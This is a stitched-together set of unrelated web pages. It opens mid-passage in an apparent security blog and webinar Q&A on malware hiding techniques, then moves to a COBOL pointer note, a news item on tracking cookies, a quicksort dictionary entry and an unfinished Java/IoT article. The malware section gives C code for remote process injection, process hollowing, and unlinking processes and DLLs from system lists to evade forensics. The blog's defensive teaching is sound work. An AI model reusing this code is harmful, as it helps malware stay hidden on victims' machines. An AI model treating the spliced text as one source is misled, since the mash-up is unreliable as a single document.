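            /* then execute whatever code was placed there */
            HANDLE th = CreateRemoteThread(proc, NULL, 0,
                            (LPTHREAD_START_ROUTINE)remote, NULL, 0, NULL);
            if (th) { ok = TRUE; CloseHandle(th); }
        }
        CloseHandle(proc);
        return ok;
    }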
A great example of malware that uses process injection is Poison Ivy. Poison Ivy's process injection is one of my favorites not only because it is very well known but also because it is used in many campaigns, and does process injection slightly differently than other kinds of malware. When malware allocates a chunk of memory, normally that chunk of memory is “contiguous”, so at the end of a memory block, it will allocate another memory block and inject code there. Poison Ivy does what we call “sharding.” Instead of having one giant memory block, it has a whole bunch of tiny memory blocks split all over the process and sometimes in various processes.
Here’s an OTX pulse on Poison Ivy: https://otx.alienvault.com/browse/pulses/?q=poison%20ivy
Another technique related to process injection is process hollowing. ‘Hollowing’ is a process where you take a known good process and start it in a suspended state. When that code is loaded and about to execute, you scoop some of the good code out (like with an ice cream scoop). Now there is available space where a bad guy can place whatever code they like, maybe change a few headers on the top and bottom to make everything seem okay, and then restart the execution process. As far as a user knows, this process looks like a normal system process started by Windows. It is therefore much more difficult for reverse engineers and memory forensics people to analyze.
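A compressed C sketch of that flow, assuming a payload image already prepared in `image` with entry-point offset `entryRva` and a bitness-matched host; the actual unmapping step (NtUnmapViewOfSection, resolved from ntdll at run time) and all error handling are omitted for brevity:

    #include <windows.h>

    void HollowInto(const wchar_t *hostExe, const BYTE *image,
                    SIZE_T size, DWORD entryRva)
    {
        STARTUPINFOW si = { sizeof(si) };
        PROCESS_INFORMATION pi;

        /* 1. start a known good process in a suspended state */
        CreateProcessW(hostExe, NULL, NULL, NULL, FALSE,
                       CREATE_SUSPENDED, NULL, NULL, &si, &pi);

        /* 2. after scooping out the original image, place the payload */
        LPVOID base = VirtualAllocEx(pi.hProcess, NULL, size,
                                     MEM_COMMIT | MEM_RESERVE,
                                     PAGE_EXECUTE_READWRITE);
        WriteProcessMemory(pi.hProcess, base, image, size, NULL);

        /* 3. point the suspended thread at the new entry point and resume;
              to the user this still looks like hostExe running normally */
        CONTEXT ctx;
        ctx.ContextFlags = CONTEXT_FULL;
        GetThreadContext(pi.hThread, &ctx);
    #ifdef _WIN64
        ctx.Rcx = (DWORD64)(ULONG_PTR)base + entryRva;
    #else
        ctx.Eax = (DWORD)(ULONG_PTR)base + entryRva;
    #endif
        SetThreadContext(pi.hThread, &ctx);
        ResumeThread(pi.hThread);
    }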
Dridex is a very good example of a malware family that often uses process hollowing. Here's an OTX pulse on Dridex: https://otx.alienvault.com/browse/pulses/?q=dridex
Process List Unlinking
Process List Unlinking is another key concept. A process is anything that is running on your computer, whether in user space or kernel space. Process List Unlinking involves the doubly linked list that contains all "active" processes; it matters because unlinking results in a process being hidden from all tools that walk that list. This can be done using ZwSystemDebugControl() or by mapping \Device\PhysicalMemory. The list holds every single process that is running, and each process object contains a forward pointer and a backward pointer to the processes in front of it and behind it, forming the doubly linked list.
Rewriting the Flink of the entry behind it and the Blink of the entry in front of it, so that they point past the process, effectively removes the process from the list. More advanced malware will take this a step further: after removing the process from the list, it will also write over that bit of memory, so even with memory forensics you wouldn't be able to locate the process.
There are tools that security researchers can use to find hidden malicious code, such as:
- PsActiveProcessHead traversal
- Pool tag scanning for processes
- Pool tag scanning for threads
This is an example bit of code that somebody would use to unlink from the process list.
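At its heart, the technique is a two-pointer splice on a LIST_ENTRY, the same link structure EPROCESS uses for ActiveProcessLinks. A self-contained C sketch of that splice (the struct is redefined here so the fragment stands alone):

    /* unlink one entry from a Windows-style doubly linked list */
    typedef struct _LIST_ENTRY {
        struct _LIST_ENTRY *Flink;   /* forward link  */
        struct _LIST_ENTRY *Blink;   /* backward link */
    } LIST_ENTRY;

    void UnlinkEntry(LIST_ENTRY *entry)
    {
        entry->Blink->Flink = entry->Flink;  /* predecessor now skips the entry   */
        entry->Flink->Blink = entry->Blink;  /* successor points back past it too */
        /* more advanced malware then rewrites the orphaned links (and the
           surrounding memory) so memory forensics finds nothing dangling */
        entry->Flink = entry;
        entry->Blink = entry;
    }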
DLL List Unlinking
Malware can also hide by manipulating the DLL list. Just like the process list, the DLL list is a doubly linked list in which each entry points to the DLL in front of it and the one behind it, and just as with the process list, there are APIs that can be called to rewrite entries in the DLL list, remove a DLL entry, and wipe out that bit of memory to help hide the malware from memory forensics or from backup tools. This is used a lot in rootkit activity.
Here we have another example of code used to unlink from the DLL list:
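Here is a hedged user-mode sketch in C, using the structures that winternl.h exposes: it hides a module by splicing its entry out of the PEB's in-memory-order list and zeroing the stale links.

    #include <windows.h>
    #include <winternl.h>
    #include <wchar.h>

    /* hide a loaded DLL from PEB-based module enumeration */
    void HideModule(const wchar_t *dllName)
    {
        PEB *peb = NtCurrentTeb()->ProcessEnvironmentBlock;
        LIST_ENTRY *head = &peb->Ldr->InMemoryOrderModuleList;

        for (LIST_ENTRY *cur = head->Flink; cur != head; cur = cur->Flink) {
            LDR_DATA_TABLE_ENTRY *mod = CONTAINING_RECORD(
                cur, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
            if (mod->FullDllName.Buffer &&
                wcsstr(mod->FullDllName.Buffer, dllName)) {
                cur->Blink->Flink = cur->Flink;      /* write over the one behind */
                cur->Flink->Blink = cur->Blink;      /* ...and the one in front   */
                SecureZeroMemory(cur, sizeof(*cur)); /* wipe the stale links      */
                break;
            }
        }
    }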
You can see where it writes over the link behind it, then the one in front, and then wipes out the memory with the zero-memory function call. One other thing to remember about DLL and process list unlinking is that all of this can be done from user space, so kernel-level administrative rights are not needed.
Kernel Module List Unlinking
Kernel modules are the next level down. A kernel module is any module loaded into the kernel. Like the DLL and process lists, the kernel modules have their own list that can be queried with APIs, returning every kernel module that is loaded. There are also debug APIs that can remove one module from the list and zero it out. This is especially important because at the kernel level, when something is zeroed out it becomes much harder to find. This requires ring-zero access and is definitely associated with rootkit activity. Generally, a piece of malware will execute in user space and then try a kernel-level exploit to get kernel administrative access; it then drops the main rootkit, which zeroes itself out of the kernel module list. At this point, the malware is very well hidden and will be very difficult to find.
Questions from the Audience:
JAVVAD: So most malware sandboxes can’t deal with samples that remain dormant for a considerable amount of time before execution, such as KeRanger. Have any new techniques been developed to overcome this?
PETER: Yes, there are a couple of different ways to overcome that. Dormant malware typically waits for a certain amount of system time to pass before executing. One way to manipulate that is to make time go faster on the virtual machine, so that every millisecond is actually ten minutes, or every millisecond is actually five hours, defeating the dormant malware by waiting it out.
JAVVAD: How can AlienVault detect the malware hiding techniques that were described in the presentation?
PETER: Excellent question. One of the ways we can detect the various hiding techniques described in the presentation is through Windows logging. One example of such detection is a process acquiring the ability to utilize the built-in Windows debug capabilities. There are known "good" applications that use those functions, but it looks suspicious when a process outside that circle utilizes those debug capabilities, and we can alert on that.
JAVVAD: Do you have anything to detect CryptoLocker or any other similar type family of ransomware?
PETER: Yes, we have correlation rules for CryptoLocker and various ransomware families.
JAVVAD: Is there anything specific that makes ransomware different to look for compared to other sorts of malware, or is it pretty much the same techniques that you use?
PETER: These techniques are more about hiding, and ransomware generally is not very good at hiding; that is not its job. Its job is to be loud and in your face. So generally we can look for that loud, in-your-face behavior, or rely on network detection, such as connections to known bad domains, etcetera.
JAVVAD: Is there a tool that can utilize OTX to scan a raw memory image file for IoCs?
PETER: What I would personally recommend is while you can't import memory images into OTX yet, you can use a tool such as Volatility to pull out IP and/or domains depending on what you want to scan, and then you can cross-reference with OTX based on the information that you pull up from the memory image.
JAVVAD: What is the general turnaround time between the AlienVault team capturing a sample of the zero-day attack and actually producing signatures?
PETER: That is hard to give an exact answer to because every bit of malware is different and every zero-day is different. Sometimes it can be a couple of hours, sometimes it may take longer than that.
JAVVAD: Yes. I will just add to that, actually. Last year, Adobe released a zero-day, and because the IoCs were being reused from previous campaigns, we were effectively blocking that zero-day three months prior to Adobe publicly announcing it. So it is not always the case that zero-days require brand-new detections.
About Peter and Javvad
Peter Ewane is a security researcher at AlienVault. Follow him on Twitter https://twitter.com/eaterofpumpkin
Javvad Malik is the security advocate at AlienVault. Follow him on Twitter https://twitter.com/J4vv4D | <urn:uuid:10d45fc6-d597-4f66-9e9d-e40942c45bb3> | CC-MAIN-2017-04 | https://www.alienvault.com/blogs/labs-research/malware-hiding-techniques-to-watch-for-alienvault-labs | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282202.61/warc/CC-MAIN-20170116095122-00015-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.941352 | 2,233 | 2.71875 | 3 |
Pointers are data items that contain virtual storage addresses. You define them either explicitly with the USAGE IS POINTER clause in the DATA DIVISION or implicitly as ADDRESS OF special registers.
You can perform the following operations with pointer data items:
Pass them between programs by using the CALL . . . BY REFERENCE statement.
Move them to other pointers by using the SET statement.
Compare them to other pointers for equality by using a relation condition.
Initialize them to contain an invalid address by using VALUE IS NULL. | <urn:uuid:edf4bb14-b803-4011-80f4-85508eaa973b> | CC-MAIN-2017-04 | http://ibmmainframes.com/about16219.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00319-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.89101 | 112 | 2.671875 | 3 |
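A minimal COBOL sketch of those four pointer operations (the program and data names are illustrative, not taken from the text above):

           IDENTIFICATION DIVISION.
           PROGRAM-ID. PTRDEMO.
           DATA DIVISION.
           WORKING-STORAGE SECTION.
           01  WS-ITEM      PIC X(8) VALUE 'POINTERS'.
           01  WS-PTR       USAGE IS POINTER VALUE NULL.
           01  WS-PTR-COPY  USAGE IS POINTER.
           PROCEDURE DIVISION.
          *    Capture an address with the ADDRESS OF special register.
               SET WS-PTR TO ADDRESS OF WS-ITEM.
          *    Move one pointer to another with SET.
               SET WS-PTR-COPY TO WS-PTR.
          *    Compare pointers for equality in a relation condition.
               IF WS-PTR = WS-PTR-COPY
                   DISPLAY 'POINTERS MATCH'
               END-IF.
          *    Pass a pointer between programs by reference.
               CALL 'SUBPROG' USING BY REFERENCE WS-PTR.
               GOBACK.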
A new type of internet cookie threatens users' privacy and security by tracking their online behaviour for advertising management, profiling, and other reasons, the EU's cyber security agency Enisa warns.
Describing the latest breed of cookies (short bits of code that help to regulate a user's visit to a website via the browser), Enisa says the advertising industry has led the drive for new, persistent and powerful cookies, with privacy-invasive features for marketing practices and profiling.
It says both the user's browser and the origin server must assist informed consent, and that users should be able to manage their cookies easily.
Enisa says the new cookies support user identification in a "persistent manner". They do not have enough "transparency" in how they are being used, so it is hard to quantify their security and privacy implications, it says.
Enisa says informed consent should guide the design of systems using cookies and that their use and the data stored in cookies should be transparent to users.
"All cookies should have user-friendly removal mechanisms which are easy to understand and use by any user," Enisa said.
It says storage of cookies outside browser control should be limited or banned, and that users should have an alternative service channel if they do not accept cookies.
Enisa executive director Udo Helmbrecht said these next-generation cookies need to be as transparent and user-controlled as regular HTTP cookies. "This would safeguard the privacy and security aspects of consumers and business alike," he said. | <urn:uuid:5f51522f-4fa3-453c-8a63-0d1865ab53fc> | CC-MAIN-2017-04 | http://www.computerweekly.com/news/1280095226/New-internet-cookies-could-steal-users-identities-invade-privacy-says-EU-cyber-agency | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00319-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.951052 | 335 | 2.65625 | 3 |
Definition: A variant of quicksort which attempts to choose a pivot likely to represent the middle of the values to be sorted.
See also median.
Note: This is one of several attempts to prevent bad worst cases in quicksort by choosing the initial pivot.
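The entry does not fix the exact rule, but the widely used median-of-three choice (the median of the first, middle, and last elements) illustrates the idea; treat this C sketch as one plausible reading:

    static void swap(int *x, int *y) { int t = *x; *x = *y; *y = t; }

    /* sort a[lo], a[mid], a[hi] so a[mid] holds their median,
       then return mid as the pivot index */
    static int choose_pivot(int a[], int lo, int hi)
    {
        int mid = lo + (hi - lo) / 2;
        if (a[mid] < a[lo])  swap(&a[mid], &a[lo]);
        if (a[hi]  < a[lo])  swap(&a[hi],  &a[lo]);
        if (a[hi]  < a[mid]) swap(&a[hi],  &a[mid]);
        return mid;
    }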
Entry modified 17 December 2004.
Cite this as:
Art S. Kagel, "balanced quicksort", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 17 December 2004. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/balancedqsrt.html | <urn:uuid:cc9065cc-a005-4f41-aa62-78989f25ca8e> | CC-MAIN-2017-04 | http://www.darkridge.com/~jpr5/mirror/dads/HTML/balancedqsrt.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00319-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.847028 | 173 | 3.015625 | 3 |
How To Capture And Edit A Screen Shot
This outline will describe how to make an image from the content displayed on your computer screen. The aim will be to isolate an item on the screen so it can be posted back to the internet.
We will be using Paint to edit the image.
1) Make the target image that you want to capture appear on the screen. If it is an error message it may be helpful to place it in the middle of the screen.
2) Press the Print Screen key once on your keyboard. This key is located to the right of the F12 key and above the Insert key, on the upper right side of the keyboard.
3) Open Paint. It will be found here... Start>Program Files>Accessories>Paint
4) From the Toolbar select Edit. The Paste option will be highlighted. Left click on it. The entire screen will be displayed in the workspace in Paint.
5) Place your mouse cursor on the upper left corner of the image you wish to save. A small cross with a circle in the center will appear. Press and hold the left mouse button. Drag the cursor down and to the right of the desired image. When the image has been highlighted with a dotted line release the mouse button.
6) Right click the mouse button and select Copy.
7) From the Toolbar select File, then New. You will be asked to save the desktop image. Select yes and give the file a name. I recommend you save it in the event you have to start over. You should now have a white empty field.
8) From the Toolbar select Edit and then Paste.
9) You will now have the image in the workspace. You will edit the image from here to either a) remove more of the image or b) keep the current view but reduce its overall size.
a) Place the mouse cursor on the lower right corner of the image. When you are in place a double arrow will appear. Press and hold down the left mouse button, and drag the cursor to the left and up till the desired size is reached. This will remove part of the image. When you have the image you want stop.
b) From the Toolbar select Image, then Stretch and Skew.... By decreasing the Horizontal and Vertical values you will reduce the size of the image. By increasing the number above 100 you will increase the image size.
Note: If you make a mistake you can simply click the Undo feature in Edit. Each time you click Undo it will take you back one step, undoing all changes.
10) Save your image by selecting Save as... under File in the Toolbar. I recommend .jpg or .gif. If you are posting your image to the internet, make sure whatever file type you use is supported.
Edited by acklan, 05 February 2006 - 12:45 AM. | <urn:uuid:4d254395-7e51-4a99-9dda-a86060b3df62> | CC-MAIN-2017-04 | https://www.bleepingcomputer.com/forums/t/43088/how-to-capture-and-edit-a-screen-shot/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00345-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.831657 | 595 | 3.15625 | 3 |
Embedded Internet-of-Thing (IoT) botnets are not a new phenomenon – we’ve seen them leveraged to launch DDoS attacks, send spam, engage in man-in-the-middle (MitM) credentials hijacking, and other malicious activities for several years. For example, a few years ago, a 75,000-strong botnet comprised of embedded devices – consumer broadband routers, in that instance – was found to be launching DDoS attacks. We routinely see IoT botnets comprised of webcams, DVRs, cable television set-top boxes, satellite set-top boxes, etc. used to launch DDoS attacks.
IoT botnets have been used to launch high-profile DDoS attacks against online gaming networks, to engage in DDoS extortion attempts, and to target organizations affiliated with the Rio Olympics, as shown above and discussed in this blog post.
IoT devices are attractive to attackers because so many of these devices are shipped with insecure defaults, including default administrative credentials, open access to management systems via the Internet-facing interfaces on these devices, and shipping with insecure, remotely exploitable code. A large proportion of embedded systems are rarely if ever updated in order to patch against security vulnerabilities – indeed, many vendors of such devices do not provide security updates at all.
Embedded IoT devices are often low-interaction – end-users don’t spend much time directly interfacing with them, and so aren’t given any clues that they’re being exploited by threat actors to launch attacks.
There are tens of millions of vulnerable IoT devices, and their numbers are growing daily; they’re generally always turned on; they reside on networks which aren’t monitored for either incoming or outgoing attack traffic; and the networks where they’re deployed often offer high-speed connections, which allows for a relatively high amount of DDoS attack traffic volume per compromised device.
Organizations can defend against DDoS attacks by implementing best current practices (BCPs) for DDoS defense, including hardening their network infrastructure, ensuring they have complete visibility into all traffic ingressing and egressing from their networks so as to detect DDoS attacks, ensuring they have sufficient DDoS mitigation capacity and capabilities (either on-premise or via cloud-based DDoS mitigation services, or both), and having a DDoS defense plan which is kept updated and is rehearsed on a regular basis.
In particular, ISP and MSSP network operators should actively participate in the global operational community, so that they can both render assistance when other network operators come under high-volume DDoS attacks and request mitigation assistance as circumstances warrant. Active, continuous cooperation between enterprise network operators, ISPs, and MSSPs is the key to successful DDoS defense.
It’s also very important that when measuring DDoS attack volumes, network operators take into account the baseline load of their normal internet traffic so as to neither underestimate or overestimate the amount of attack traffic targeting their networks and customers. This is vital when determining which DDoS defense mechanisms and methodologies to employ in the course of an attack, as well as to ensure that accurate information is provided to the global operational community and to the media. | <urn:uuid:5403bd23-d86b-4fa3-9fa7-cab4d83bb01c> | CC-MAIN-2017-04 | https://resources.arbornetworks.com/h/i/296396268-some-perspective-on-iot-devices-and-ddos-attacks | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282937.55/warc/CC-MAIN-20170116095122-00126-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.941686 | 674 | 2.8125 | 3 |
Loosely Coupled Multiprocessors
Our previous discussions of multiprocessors focused on systems built with a modest number of processors (no more than about 50), which communicate via a shared bus.
The class of computers we shall consider in this and the next lecture is called “MPP”, for “Massively Parallel Processor”. As we shall see, the development of MPP systems was resisted for a long time, due to the belief that such designs could not be cost effective.
We shall see that MPP systems finally evolved due to a number of factors, at least one of which only became operative in the late 1990’s.
These factors included:
The availability of small and inexpensive microprocessor units (Intel 80386, etc.) that could be efficiently packaged into a small unit.
The discovery that many very important problems were quite amenable to parallel implementation.
The discovery that many of these important problems had structures of such regularity that sequential code could be automatically translated for parallel execution with little loss in efficiency.
The process of converting a sequential program for parallel execution is often called “parallelization”. One speaks of “parallelizing an algorithm”; often this is misspoken as “paralyzing an algorithm” – which unfortunately might be true.
The Speed–Up Factor
In an earlier lecture, we spoke of the speed–up factor, S(N), which denotes how much faster a program will execute on N processors than on one processor. At the time, we referenced early opinions that the maximum speed–up for N processors would be somewhere in the range [log2(N), N/log2(N)].
We shall show some data for multicomputers with 2 to 65,536 processors in the next few slides. Recall that 65,536 = 2^16. The processor counts were chosen so that I could perform the calculation log2(N) in my head; log2(65,536) = 16 because 65,536 = 2^16.
The plots are log–log plots, in which each axis is scaled logarithmically. This allows the data to be seen. The top line represents linear speedup, the theoretical upper limit.
In the speedup graph, we see that the speed–up factor N/log2(N) might be acceptable, though it is not impressive.
The next graph is what I call “cost efficiency”. It is the speed–up factor divided by the number of processors: S(N)/N. This factor measures the economic viability of the design.
Under the assumptions above, we see easily why large MPP designs did not appear to be attractive in the early 1990’s and before.
The Speed–Up Factor: S(N)
Examine a few values for the N/log2(N) speedup: S(1024) = 102 and S(65536) = 4096. These might be acceptable under certain specific circumstances.
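These values follow directly from the formula, as a few lines of C confirm:

    #include <math.h>
    #include <stdio.h>

    /* evaluate S(N) = N / log2(N) for the processor counts above */
    int main(void)
    {
        int n[] = { 1024, 65536 };
        for (int i = 0; i < 2; i++)
            printf("S(%d) = %.0f\n", n[i], n[i] / log2(n[i]));
        return 0;   /* prints S(1024) = 102 and S(65536) = 4096 */
    }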
The Cost Efficiency Factor: S(N) / N
This chart shows the real problem that was seen for MPP systems before the late 1990’s. Simply put, they were thought to be very cost inefficient.
Linear Speedup: The MPP Goal
The goal of MPP system design is called “linear speedup”, in which the performance of an N–processor system is approximately N times that of a single processor system.
Earlier in this lecture we made the comment that “Many important problems, particularly ones that apply regular computations to massive data sets, are quite amenable to parallel implementations”.
Within the context of our lectures, the ambiguous phrase “quite amenable to parallel implementations” acquires a specific meaning: there are well–know algorithms to solve the problem and these algorithms can display a nearly–linear speedup when implemented on MPP systems.
As noted in an earlier lecture “Characteristics of Numerical Applications”, problems that can be solved by algorithms in the class called “continuum models” are likely to show near–linear speedup. This is due to the limited communication between cells in the continuum grid.
There are other situations in which MPP systems might be used. In 1990, Hennessy and Patters on [Ref. 2, page 575] suggested that “a multiprocessor may be more effective for a timesharing workload than a SISD [single processor]”. This seems to be the usage on the large IBM mainframe used by CSU to teach the course in assembly language.
Linear Speedup: The View from the Early 1990’s
Here is what Harold Stone [Ref. 3] said in his textbook. The first thing to note is that he uses the term “peak performance” for what we call “linear speedup”.
His definition of peak performance is quite specific. I quote it here.
“When a multiprocessor is operating at peak performance, all processors are engaged in useful work. No processor is idle, and no processor is executing an instruction that would not be executed if the same algorithm were executing on a single processor. In this state of peak performance, all N processors are contributing to effective performance, and the processing rate is increased by a factor of N. Peak performance is a very special state that is rarely achievable.” [Ref. 3, page 340].
Stone notes a number of factors that introduce inefficiencies and inhibit peak performance. Here is his list.
1. The delays introduced by interprocessor communication.
2. The overhead in synchronizing the work of one processor with another.
3. The possibility that one or more processors will run out of tasks and do nothing.
4. The process cost of controlling the system and scheduling the tasks.
Early History: The C.mmp
While this lecture will focus on multicomputers, it is instructive to begin with a review of a paper on the C.mmp, which is a shared–memory multiprocessor.
The C.mmp is described in a paper by Wulf and Harbinson [Ref. 6], which has been noted as “one of the most thorough and balanced research–project retrospectives … ever seen”. Remarkably, this paper gives a thorough description of the project’s failures.
The C.mmp is described [Ref. 6] as “a multiprocessor composed of 16 PDP–11’s, 16 independent memory banks, a crosspoint [crossbar] switch which permits any processor to access any memory, and a typical complement of I/O equipment”. It includes an independent bus, called the “IP bus”, used to communicate control signals.
As of 1978, the system included the following 16 processors.
5 PDP–11/20’s, each rated at 0.20 MIPS (that is 200,000 instructions per second)
11 PDP–11/40’s, each rated at 0.40 MIPS
3 megabytes of shared memory (650 nsec core and 300 nsec semiconductor)
The system was observed to compute at 6 MIPS.
The Design Goals of the C.mmp
The goal of the project seems to have been the construction of a simple system using as many commercially available components as possible.
The C.mmp was intended to be a research project not only in distributed processors, but also in distributed software. The native operating system designed for the C.mmp was called “Hydra”. It was intended as an OS kernel, intended to provide only minimal services and encourage experimentation in system software.
As of 1978, the software developed on top of the Hydra kernel included file systems, directory systems, schedulers and a number of language processors.
Another part of the project involved the development of performance evaluation tools, including the Hardware Monitor for recording the signals on the PDP–11 data bus and software tools for analyzing the performance traces.
One of the more important software tools was the Kernel Tracer, which was built into the Hydra kernel. It allowed selected operating system events, such as context swaps and blocking on semaphores, to be recorded while a set of applications was running.
The Hydra kernel was originally designed based on some common assumptions. When experimentation showed these to be false, the Hydra kernel was redesigned.
The C.mmp: Lessons Learned
The researchers were able to implement the C.mmp as “a cost–effective, symmetric multiprocessor” and distribute the Hydra kernel over all of the processors.
The use of two variants of the PDP–11 was considered as a mistake, as it complicated the process of making the necessary processor and operating system modifications. The authors had used newer variants of the PDP–11 in order to gain speed, but concluded that “It would have been better to have had a single processor model, regardless of speed”.
The critical component was expected to be the crossbar switch. Experience showed the switch to be “very reliable, and fast enough”. Early expectations that the “raw speed” of the switch would be important were not supported by experience.
The authors concluded that “most applications are sped up by decomposing their algorithms to use the multiprocessor structure, not by executing on processors with short memory access times”.
The simplicity of the Hydra kernel, with much system software built on top of it, yielded benefits, such as few software errors caused by inadequate synchronization.
The C.mmp: More Lessons Learned
Here I quote from Wulf & Harbison [Ref. 6], arranging their comments in an order not found in their original. The PDP–11 was a memory–mapped architecture with a single bus, called the UNIBUS, that connected the CPU to both memory and I/O devices.
1. “Hardware (un)reliability was our largest day–to–day disappointment … The aggregate mean–time–between–failure (MTBF) of C.mmp/Hydra fluctuated between two to six hours.”
2. “About two–thirds of the failures were directly attributable to hardware problems. There is insufficient fault detection built into the hardware.”
3. “We found the PDP–11 UNIBUS to be especially noisy and error–prone.”
4. “The crosspoint [crossbar] switch is too trusting of other components; it can be hung by malfunctioning memories or processors.”
My favorite lesson learned is summarized in the following two paragraphs in the report.
“We made a serious error in not writing good diagnostics for the hardware. The software developers should have written such programs for the hardware.”
“In our experience, diagnostics written by the hardware group often did not test components under the type of load generated by Hydra, resulting in much finger–pointing between groups.”
Task Management in Multicomputers
The basic idea behind both multicomputers and multiprocessors is to run multiple tasks or multiple task threads at the same time. This goal leads to a number of requirements, especially since it is commonly assumed that any user program will be able to spawn a number of independently executing tasks or processes or threads.
According to Baron and Higbie [Ref. 5], any multicomputer or multiprocessor system must provide facilities for these five task–management capabilities.
1. Initiation: A process must be able to spawn another process; that is, generate another process and activate it.
2. Synchronization: A process must be able to suspend itself or another process until some sort of external synchronizing event occurs.
3. Exclusion: A process must be able to monopolize a shared resource, such as data or code, to prevent “lost updates”.
4. Communication: A process must be able to exchange messages with any other active process that is executing on the system.
5. Termination: A process must be able to terminate itself and release all resources being used, without any memory leaks.
These facilities are more efficiently provided if there is sufficient hardware support.
Hardware Support for Multitasking
Any processor or group of processors that supports multitasking will do so more efficiently if the hardware provides an appropriate primitive operation.
A test–and–set operation with a binary semaphore (also called a “lock variable”) can be used for both mutual exclusion and process synchronization. This is best implemented as an atomic operation, which in this context is one that cannot be interrupted until it completes execution. It either executes completely or fails.
The MIPS provides another set of instructions to support synchronization. In this design, synchronization is achieved by using a pair of instructions, issued in sequence.
After the first instruction in the sequence is executed, the second is executed and returns a value from which it can be deduced whether or not the instruction pair was executed as if it were a single atomic instruction.
The MIPS instruction pair is load linked and store conditional.
These are often used in a spin lock scenario, in which a processor executes in a tight loop awaiting the availability of the shared resource that has been locked by another processor.
In fact, this is not a necessary part of the design, but just its most common use.
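As a concrete illustration, here is a minimal spin lock built on C11’s atomic test-and-set primitive; the atomic_flag plays the role of the binary semaphore (lock variable) described above:

    #include <stdatomic.h>

    static atomic_flag lock = ATOMIC_FLAG_INIT;

    void acquire(void)
    {
        /* test-and-set returns the old value; spin while it was set,
           i.e. while another processor holds the shared resource */
        while (atomic_flag_test_and_set(&lock))
            ;
    }

    void release(void)
    {
        atomic_flag_clear(&lock);   /* make the resource available again */
    }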
Clusters, Grids, and the Like
There are many applications amenable to an even looser grouping of multicomputers. These often use collections of commercially available computers, rather than just connecting a number of processors together in a special network.
In the past there have been problems of administering large clusters of computers; the cost of administration scaling as a linear function of the number of processors. Recent developments in automated tools for remote management are likely to help here.
It appears that blade servers are one of the more recent adaptations of the cluster concept. The major advance represented by blade servers is the ease of mounting and interconnecting the individual computers, called “blades”, in the cluster.
In this aspect, the blade server hearkens back to the 1970’s and the innovation in instrumentation called “CAMAC”, which was a rack with a standard bus structure for interconnecting instruments. This replaced the jungle of interconnecting wires, so complex that it often took a technician dedicated to keeping the communications intact.
Clusters can be placed in physical proximity, as in the case of blade servers, or at some distance and communicate via established networks, such as the Internet. When a network is used for communication, it is often designed using TCP/IP on top of Ethernet simply due to the wealth of experience with this combination.
In this lecture, material from one or more of the following references has been used.
1. Computer Organization and Design, David A. Patterson & John L. Hennessy, Morgan Kaufmann (3rd Edition, Revised Printing), 2007. (The course textbook) ISBN 978-0-12-370606-5.
2. Computer Architecture: A Quantitative Approach, John L. Hennessy and David A. Patterson, Morgan Kaufmann, 1990. There is a later edition. ISBN 1-55860-069-8.
3. High-Performance Computer Architecture, Harold S. Stone, Addison-Wesley (Third Edition), 1993. ISBN 0-201-52688-3.
4. Structured Computer Organization, Andrew S. Tanenbaum, Pearson/Prentice-Hall (Fifth Edition), 2006. ISBN 0-13-148521-0.
5. Computer Architecture, Robert J. Baron and Lee Higbie, Addison-Wesley Publishing Company, 1992. ISBN 0-201-50923-7.
6. W. A. Wulf and S. P. Harbison, “Reflections in a pool of processors / An experience report on C.mmp/Hydra”, Proceedings of the National Computer Conference (AFIPS), June 1978. | <urn:uuid:489b991d-1ca0-467b-bb40-494e1b610878> | CC-MAIN-2017-04 | http://edwardbosworth.com/My5155_Slides/Chapter13/Multiprocessors_02.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00430-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.945472 | 3,389 | 3.15625 | 3 |
What is Java to you? A programming language you learned in college? The lingua franca of corporate IT? Would you believe that Java is poised to dominate the next explosion of the Internet? Built for embedded computing and streamlined for real-time applications, here's why Java is the language for IoT.
The years from 1969 to the present saw networked devices balloon from four university computers connected via the ARPANET to about two billion humans frequently accessing the Internet today. In the near future that number will multiply exponentially again, from a couple billion networked devices to tens of billions of embedded processors. Every aspect of our lives will be connected by networked devices: homes, workplaces, vehicles, appliances, tools, toys -- you name it.
While chatter about the Internet of Things (IoT) includes a component of fashionable hype, the underlying reality is that imminent changes in Internet growth will make previous generations of computing look trivial by comparison. IoT is not only here to stay; it's here to change everything. Consider the following timeline, which shows previous tipping points for the Internet as we have known it:
- 1982-1989: Birth of the TCP/IP internet.
- 1985-1989: Commercialization of the Internet begins.
- 1990-1991: Advent of the World Wide Web.
- 1990-1998: Conventional desktop computers re-engineered as intrinsically networked devices.
- 1996-present: Slowly but surely, we enter the age of global domination by mobile networked devices (aka IoT).
Complementary technologies that enable IoT are coming online now. HTTP/2 is a crucial networking protocol that has been updated, in part, to accommodate machine-to-machine communications. Thingsee is an example of a developer kit for the kind of hardware that IoT will demand.
Silicon Valley sage Tim O'Reilly has emphasized that the result will not be just the usual caricature of pointless connections from coffee machines or refrigerators to the 'Net at large. With enough sensors and automation, IoT is really about human augmentation. Java will be a workhorse in that coming disruption.
How IoT works
In September 2014, Andrew C. Oliver wrote that at an implementation level IoT is about teamwork. In this case, the teamwork involves both humans and computers.
